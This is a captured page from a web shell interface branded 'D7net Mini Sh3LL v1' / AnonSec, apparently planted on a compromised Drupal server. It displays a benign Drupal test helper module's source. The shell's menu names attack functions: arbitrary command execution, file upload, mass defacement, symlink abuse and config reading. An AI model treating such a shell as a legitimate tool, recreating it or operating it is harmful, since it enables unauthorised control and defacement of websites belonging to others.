D7net Mini Sh3LL v1

 
OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : OFF
Directory (0775) :  /var/www/html/../html/marc-drupal/modules/simpletest/tests/

 Home   ☍ Command   ☍ Upload File   ☍Info Server   ☍ Buat File   ☍ Mass deface   ☍ Jumping   ☍ Config   ☍ Symlink   ☍ About 

Current File : /var/www/html/../html/marc-drupal/modules/simpletest/tests/common_test_cron_helper.module
<?php
/**
 * @file
 * Helper module for the testCronExceptions in addition to common_test module.
 */

/**
 * Implements hook_cron().
 *
 * common_test_cron() throws an exception, but the execution should reach this
 * function as well.
 *
 * @see common_test_cron()
 */
function common_test_cron_helper_cron() {
  variable_set('common_test_cron', 'success');
}

AnonSec - 2021 | Recode By D7net